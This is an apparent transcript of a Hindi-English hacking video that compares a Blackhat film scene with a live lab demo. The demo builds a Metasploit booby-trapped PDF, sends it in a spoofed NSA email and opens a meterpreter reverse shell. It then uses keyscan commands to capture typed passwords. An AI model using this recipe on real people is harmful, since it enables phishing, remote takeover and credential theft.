Hi everyone, how's it going? Welcome to the episode 2 of our Hacking Scenes Debunk series. इस सीरीज में हम मूवीज के हैकिंग सीन्स को डिबंक करते हैं और देखते हैं कि इफ इट इज पॉसिबल इन रियल लाइफ और नॉट। इन द लास्ट वीडियो हमने सोशल नेटवर्क मूवी के हैकिंग सीन को डिबंक किया था, तो अगर आपने वीडियो नहीं देखी है सो प्लीज गो एंड वॉच। आज जिस मूवी के बारे में हम बात करेंगे दैट इज ब्लैक हैट। ये 2014 की एक मूवी है जिसमें जो हमारा मेन प्रोटैगनिस्ट है वो एक कन्विक्टेड हैकर होता है जिसे साइबर क्राइम माफिया को ट्रैक करने के लिए जेल से बाहर निकाला जाता है बाय चाइनीज इंटेलिजेंस एंड FBI। इसी मूवी में एक सीन है जहां पे ब्लैक विडो प्रोग्राम का जिक्र किया गया है। ब्लैक विडो प्रोग्राम USA की नेशनल सिक्योरिटी एजेंसी और NSA द्वारा डेवलप किया हुआ प्रोग्राम था जिसे डेटा रिकवरी के लिए यूज किया जाता है। मूवी के प्लॉट के हिसाब से इन ऑर्डर टू ट्रैक द साइबर क्रिमिनल्स उनको न्यूक्लियर पावर प्लांट की हार्ड ड्राइव्स का डेटा रिकवर करना था, जिसके लिए वो NSA से रिक्वेस्ट करते हैं ब्लैक विडो प्रोग्राम के एक्सेस के लिए। हाउएवर दे डिनाइड। तो अब उसका एक्सेस लेने के लिए जो हमारा मेन लीड है वो NSA के डायरेक्टर को हैक करता है। लेट्स सी हाउ। You asked him to change his password? When he downloaded the PDF, what he downloaded was the keylogger. Got it. Now we wait. तो जैसा कि हमने देखा, हमारे हैकर ने NSA के डायरेक्टर को एक ईमेल भेजा इम्पर्सनेटिंग वन ऑफ हिज कलीग्स। उस ईमेल में यह लिखा था कि चाइनीज स्पेशलिस्ट और FBI का जो जॉइंट ऑपरेशन चल रहा है उसमें तुम्हारे ब्लैक विडो प्रोग्राम के क्रेडेंशियल्स को खतरा हो सकता है सिक्योरिटी वाइज, तो अपना पासवर्ड चेंज कर लो। उसके नीचे एक PDF का लिंक दिया था जिसमें जनरल गाइडलाइंस होंगी पासवर्ड चेंज को लेके। जैसे ही NSA का डायरेक्टर उस PDF को डाउनलोड करता है, our hacker gets access of his system because When he downloaded the PDF, what he downloaded was the keylogger. yes, कीलॉगर्स। अब कीलॉगर्स एक ऐसा मलिशियस प्रोग्राम होता है जो आपके हर कीस्ट्रोक को रिकॉर्ड करता है और उसे हैकर के पास भेजता है। तो आप जितनी भी चैट्स करोगे, जो भी यूजर नेम और पासवर्ड डालोगे किसी भी वेबसाइट में, वो सारा हैकर के पास चला जाएगा। एंड दैट इज हाउ हमारे हैकर को ब्लैक विडो प्रोग्राम का एक्सेस मिला, क्योंकि जैसे ही NSA के डायरेक्टर ने अपना पासवर्ड चेंज करने के लिए नया पासवर्ड डाला, द सेम पासवर्ड वाज रिलेड टू द हैकर, thus गिविंग हिम एक्सेस। आओ इसे प्रैक्टिकली देखते हैं। ऑलराइट, सो मैं आ गया हूं अपनी काली मशीन में यहाँ पे, और इस डेमो को परफॉर्म करने के लिए हम Adobe Acrobat रीडर का एक एक्सप्लॉइट का यूज़ करेंगे। तो उसके लिए मैं अपना मेटास्प्लॉइट फ्रेमवर्क को स्टार्ट कर लेता हूँ। सो MSF कंसोल। तो अभी अपना मेटास्प्लॉइट फ्रेमवर्क स्टार्ट हो जाएगा एंड अभी हम सर्च करेंगे सर्च फॉर Adobe। तो Adobe के रिलेटेड जितने भी एक्सप्लॉइट है हमारे पास यहाँ पे ये दिखा देगा मैं। सो मैंने सर्च दबाया और यहाँ पे मुझे बहुत सारे एक्सप्लॉइट दिखा रहा है, बट जो हमारे काम का है वो है दिस वन, एक्सप्लॉइट विंडोज़ फाइल फॉर्मेट Adobe PDF Embedded EXE। ठीक है, एक्सीलेंट लेवल का एक्सप्लॉइट है ये एंड काफ़ी ओल्ड एक्सप्लॉइट है। तो अब इसको यूज़ कर लेते हैं। तो मैं यहाँ पे गया यूज़ और यहाँ से मैं इसको कॉपी कर लेता हूँ। ठीक है, तो अभी मैं इसके इन्फो चेक करूँ कि एक्सप्लॉइट करता क्या है, तो ये थोड़ा सा मुझे यहाँ पे इसके बारे में बताएगा। ठीक है, तो ये विंडोज़ के लिए एक्सप्लॉइट है, इसकी डिस्क्लोज डेट 2010 की है। सो जैसे कि मैंने आपको बताया काफ़ी ओल्ड एक्सप्लॉइट है। सो दिस मॉड्यूल एम्बेड्स अ मेटास्प्लॉइट पेलोड इनटू एन एग्जिस्टिंग PDF फाइल। तो एक एग्जिस्टिंग PDF फाइल में ये जो पेलोड है मेटास्प्लॉइट का उसको एम्बेड करता है, EXE पेलोड जो बनाता है मेटास्प्लॉइट, और उसके रिजल्टिंग PDF कैन बी सेंड टू अ टारगेट एज अ पार्ट ऑफ सोशल इंजीनियरिंग अटैक। तो जैसे ही वो उस PDF को खोलेगा मेटास्प्लॉइट पेलोड एग्जीक्यूट हो जाएगा। ठीक है, तो इसके कुछ ऑप्शंस हैं यहाँ पे, उसको देख लेते हैं। ऑप्शंस कमांड लगाऊंगा मैं, क्या क्या हमें सेट करना है। तो मेरा L होस्ट यहाँ पे ऑलरेडी सेट है, L पोर्ट मैं चेंज कर लेता हूँ जस्ट फॉर द सेक ऑफ इट। सो 9999 रख देते हैं
एलपोर्ट। उसके अलावा हम दे सकते हैं इसमें फाइल नेम दे सकते हैं, EXE नेम दे सकते हैं, फाइल नेम दे सकते हैं एंड इन फाइल नेम दे सकते हैं। ठीक है, तो फाइल नेम पहले सेट कर लेता हूँ मैं। सेट फाइल नेम, जो टारगेट को दिखेगी फाइल नेम। सो जो हमारे केस में हमने जो वीडियो देखी उसमें जो फाइल नेम था वो पासवर्ड सिक्योरिटी गाइडलाइंस था, तो मैं वही रख लेता हूँ, पासवर्ड सिक्योरिटी गाइडलाइंस .pdf। ठीक है, एंड इन फाइल नेम हम रखेंगे इन फाइल नेम जो हम फाइल यूज़ करना चाहते हैं। तो मेरे पास एक फ़ाइल है यहाँ पे, अगर मैं अपना फोल्डर खोलूँ एंड passwords.pdf करके मेरे पास एक नॉर्मल सी PDF है जिसमें NSA के द्वारा ये PDF है, नेशनल सिक्योरिटी एजेंसी और सेंट्रल सिक्योरिटी सर्विस USA की। ठीक है, तो उनकी तरफ से ये निकाली थी मैंने PDF ऑनलाइन, जिसमें वो पासवर्ड सिक्योरिटी के रिगार्डिंग कुछ उन्होंने डिटेल्स प्रोवाइड कराई हैं। तो ये लेजिट डॉक्यूमेंट लगेगा NSA की तरफ से। ठीक है, तो इसका हम यूज़ करेंगे एज अ बेट। तो मैं इसका नाम सेट कर लेता हूँ, सेट फाइल नेम, और ये है passwords.pdf। उसके बाद और हमारे पास यहाँ पे ये लॉन्च मैसेज भी हम कर सकते हैं, बट इसको मैं डिफ़ॉल्ट ही रहने देता हूँ। एंड अगर मैं अब ऑप्शंस चेक करूँ, सो हमारा सारी चीज़ें यहाँ पे सेट हो चुकी हैं। सो नाउ हिट एक्सप्लॉइट, और ये अब एक PDF इसने जनरेट कर दिया है इस पर्टिकुलर लोकेशन में जिसका नाम है पासवर्ड सिक्योरिटी गाइडलाइंस .pdf। तो मैं एक यहाँ पे टर्मिनल खोल लेता हूँ एंड लेट्स गो टू दिस लोकेशन। सो ये थी होम हमारी .msf लोकल, और यहाँ पे हमारे पे ये PDF दिखाई दे रहा है। ठीक है, तो इसको सर्व करने के लिए मैं पाइथन HTTP सर्वर का यूज़ करूँगा। तो मैंने कमांड लगाया python 3-m HTTP सर्वर। तो यहाँ पे अब ये पोर्ट 8000 में हमारी PDF को सर्व कर रहा है। ठीक है, लेट्स गेट बैक, और अब हम एक लिसनर स्टार्ट करेंगे ताकि जब जैसी वो PDF को एग्जीक्यूट करे अपने सिस्टम में तो हमें लिसनर में हमें उसका कनेक्शन मिल जाए। तो मैं एक नया टर्मिनल स्पॉन कर लेता हूँ यहाँ पे, और मैं कमांड लगाऊंगा MSF कंसोल अगेन। तो मेटास्प्लॉइट फ्रेमवर्क स्टार्ट हो जाएगा हमारे लिए। ओके, तो अब मैं कमांड करूँगा यूज़ एक्सप्लॉइट मल्टी हैंडलर। ठीक है, अब पेलोड सेट करते हैं अपना। सो विंडोज़ मेटरप्रेटर रिवर्स TCP, एंड उसके बाद सेट हम lhost करेंगे अपना। तो lhost है 192.168.29.160, एंड उसके बाद lport करेंगे हम सेट जो कि है 9999, और उसके बाद एक्सप्लॉइट। तो अब हमारा लिसनर रेडी हो जाएगा फॉर एनी इनकमिंग कनेक्शंस। सो ये रेडी हो गया यहाँ पे, एंड नाउ वी हैव टू जस्ट सेंड द PDF टू द विक्टिम। तो आओ उसको देख लेते हैं। ओके, सो मैं आ गया अपनी टारगेट विंडोज़ मशीन में, और यहाँ पे मैंने एक ईमेल खोल रखा है। सो मेरे पास एक ईमेल आया है बैन हिचन्स के नाम से। सो वैसे ही मैंने एक ईमेल फॉर्म किया था b.hitchensnsa@outlook.com, एंड द टॉपिक इज रिवाइज ड्राफ्ट ऑफ इंटेलिजेंस रिपोर्ट। सो ये डोनाहो को बोल रहा है, इन द लाइट ऑफ द फैक्ट दैट यू वर कॉन्टेक्टेड बाय एन FBI एजेंट वर्किंग ऑन अ जॉइंट टास्क फोर्स विद चाइनीज साइबर स्पेशलिस्ट, वी हैव बिकम कंसर्न्ड अबाउट द सिक्योरिटी ऑफ योर ब्लैक विडो रिमोट लॉगिन्स। वी स्ट्रांगली सजेस्ट यू चेंज योर पासवर्ड। सेम उसी तरह का ईमेल फॉर्म हुआ है डिट्टो, एंड बैन हिचन्स के नाम से ये ईमेल आया है। नीचे उसने बैन हिचन्स ने सेंड फ्रॉम फोन है यहाँ पे, और नीचे आप देखोगे तो पासवर्ड सिक्योरिटी गाइडलाइंस .pdf जो हमने वीडियो में देखा था सेम यहाँ पे, और एक डाउनलोड लिंक है। तो इफ़ आई क्लिक ऑन सेव लिंक एज, तो मैं सेव कर लेता हूँ इसको, और डाउनलोड्स में कर लेते हैं इसको सेव। तो फाइट सेव, तो यहाँ पे मुझे एक ये बता रहा है सिक्योरिटी वार्निंग फ्रॉम द ब्राउजर बिकॉज हम एक फाइल डाउनलोड मार रहे हैं डायरेक्ट। सो इट कुड बी पोटेंशियल रिस्क, बट हम अलाउ डाउनलोड करेंगे और ये डाउनलोड होगी हमारे उसमें। तो अगर मैं अब डाउनलोड फोल्डर में जाऊँ अपने, तो मेरे पास यहाँ पे पासवर्ड सिक्योरिटी गाइडलाइंस करके एक PDF यहाँ पे मुझे दिखाई दे रही है। ठीक है, तो अभी इसको खोलने के लिए यहाँ पे अडोबी दिखा रहा है। तो मेरे पास अडोबी एक्रोबैट रीडर 9 है जिसके लिए वल्नरेबिलिटी है। इस पर्टिकुलर सॉफ्टवेयर में ये वल्नरेबिलिटी है कि हम जो PDF फाइल है उसके साथ कुछ EXE एम्बेड करके भेज सकते हैं और वो उसको रेंडर करेगा, उसको एग्जीक्यूट करेगा। सो दिस इज़ एप्लीकेबल इन दिस पर्टिकुलर अडोबी रीडर का वर्जन में। ठीक है, तो अगर मैं इसको खोलूँ तो डबल क्लिक करूँगा मैं, ये पूछ रहा है मेरे से अडोबी रीडर 9 में आपको खोलना है। ठीक है, इफ़ आई हिट ओके, तो यहाँ पे एक फाइल स्पेसिफाई फाइल टू एक्सट्रैक्ट, तो मैंने यहाँ पे एक फ़ाइल सेव करी, एंड ये बोल रहा है एक वार्निंग, जो लॉन्च मैसेज वहाँ पे हमने सेट करा था वही सेम चीज़ दिखा रहा है। टू व्यू द इनक्रिप्टेड कंटेंट प्लीज टिक द डू नॉट शो दिस मैसेज बॉक्स एंड ओपन। तो अगर मैं ओपन में क्लिक करूँ तो ये PDF मेरे पास यहाँ पे खुल चुकी है, नॉर्मल सी PDF है। ठीक है, जो कि हमने सेट करी थी। बट अगर मैं अब अपनी काली मशीन में वापस जाऊँ तो मेरी काली मशीन में मुझे यहाँ पे एक मीटरप्रेटर सेशन मिल गया है
तो इफ़ आई क्लिक sysinfo तो मैं विंडोज़ 10 का मुझे यहाँ पे कंप्लीट एक्सेस मिल गया। तो एक बार स्क्रीनशॉट भी लेके देख लेते हैं। स्क्रीनशॉट एंड एक स्क्रीनशॉट सेव हुआ है इस नाम से NZTN। सो मैं इसको सर्च कर लेता हूँ, NZ ये वाला है। एंड सेम जो वहाँ पे अभी विक्टिम देख रहा है उसका हम सेम चीज़ को व्यू कर सकते हैं यहाँ पे। ग्रेट। बट जो मेन थिंग यहाँ पे थी दैट वाज की लॉगर। सो मेटास्प्लॉइट की मदद से, मेटास्प्लॉइट हैज़ इट्स ओन बिल्ट इन की लॉगर, तो हम उसका यूज़ कर सकते हैं। दैट इज़ द कमांड इज़ की स्कैन स्टार्ट। ठीक है, तो अभी की स्ट्रोक जो है वो स्निफर स्टार्ट हो गया है विक्टिम मशीन में। तो अभी विक्टिम मशीन में वापस चलते हैं। ऑलराइट, सो मैं यहाँ पे एक नोटपैड खोलूँगा। ठीक है, एंड यहाँ पे मैं लिखता हूँ माई पासवर्ड इज़ 12345। ठीक है, ये मैंने लिखा। अब एक काम करते हैं, फायरफॉक्स ऑलरेडी ओपन है हमारा और गूगल में चलते हैं। ठीक है, गूगल जीमेल में यहाँ पे लॉगिन करने की कोशिश करता हूँ और यहाँ पे मैं एक ईमेल डालता हूँ test@gmail.com। ठीक है, एंड इफ आई हिट नेक्स्ट तो ये बोल रहा है couldn't find any अकाउंट। कोई दिक्कत नहीं है, तो मैं कुछ भी नाम डाल देता हूँ, test123। ओके, तो इसने ले लिया है आई एम नॉट अ रोबोट। ठीक है, तो अभी मेरे से पासवर्ड मांग रहा है। पासवर्ड मुझे नहीं पता, बस मैं 1234 या फिर पासवर्ड यहाँ पर डाल देता हूँ। ठीक है, एंड इफ आई हिट नेक्स्ट तो ये मुझे कैप्चा वगैरह दे रहा है। बट अगर मैं अपनी काली मशीन में वापस जाऊँ, अभी जो भी मैंने अभी यहाँ पे टाइप किया है, तो यहाँ पे हमारा स्निफर स्टार्टेड था। बट अब जो भी स्निफ करा है इसने, अगर मैं उसको डंप करूँ तो की स्कैन डंप मैंने कमांड लगाया एंड यहाँ पे देखो आप, सो डंपिंग कैप्चर्ड की स्ट्रोक्स। सो सबसे पहले हमने नोटपैड खोला था। ठीक है, नोट लिख के मैंने नोटपैड खोला था। उसके बाद मैंने नोटपैड में लिखा था माई पासवर्ड इज़ 12345। उसके बाद मैं गया गूगल में। ठीक है, जीमेल में, पहले मैं गूगल में जा रहा था, फिर मैंने gmail.com टाइप किया। उसके बाद मैंने एक ईमेल आईडी डाली थी test@1234। तो ये जिस हिसाब से हम टाइप करते हैं उस हिसाब से ये कैप्चर करता है। इसको आप और प्रिसाइज बना सकते हो, बट आई गॉट द पासवर्ड ओवर हियर। ठीक है, तो अगर टाइपिंग स्पीड में ऊपर नीचे हो सकता है क्योंकि ये शिफ्ट भी ले रहा है। ठीक है, और अगर आप कुछ टैब वगैरह दबाते हो तो दैट इट ऑल्सो कंसिडर्स। बट जो पॉइंट है यहाँ पे, जो भी वो टाइप करेगा विक्टिम, वो हमें इस की लॉगर की मदद से मिल जाएगा। ठीक है, तो इसको अगर स्टॉप करना है मुझे तो मैं की स्कैन स्टॉप लिख सकता हूँ यहाँ पे, और ये की स्ट्रोक जो स्निफर है वो बंद हो जाएगा। सो दैट्स हाउ यू कैन यूज़ की लॉगर टू गेट पासवर्ड्स और टू गेट वट एवर द विक्टिम इज टाइपिंग। सो आई होप यू गेट दैट। सो ऑन दैट नोट लेट्स कंक्लूड दिस वीडियो। आज हमने देखा हाउ यू कैन गेट हैक्ड यूजिंग अ PDF, बट अ बिग थिंग टू नोट हियर वाज आउटडेटेड सॉफ्टवेयर। अब आप सोचोगे कि ये डेमो तो डिपेंड करता है एक पर्टिकुलर वर्जन ऑफ एक्रोबैट रीडर के, लेकिन इन रियलिटी पीपल डोंट अपडेट सॉफ्टवेयर्स लाइक PDF रीडर। और अगर हैकर को इस चीज़ की जानकारी है देन ही कैन प्लान आउट अ पर्टिकुलर अटैक ऑन दैट बेसिस। तो अगर वीडियो पसंद आई तो इसे लाइक मारो। कोई चीज़ समझ नहीं आई तो आइदर कमेंट हियर और मैसेज मी ऑन Instagram @inventyourshit एंड ऑल्सो सब्सक्राइब टू दिस चैनल। और जिसको भी फ्री हैकिंग रिसोर्सेज चाहिए, डिस्क्रिप्शन में टेलीग्राम चैनल का लिंक है, सो ज्वाइन देयर। मैं मिलता हूँ आपको अगली वीडियो में। बाय बाय।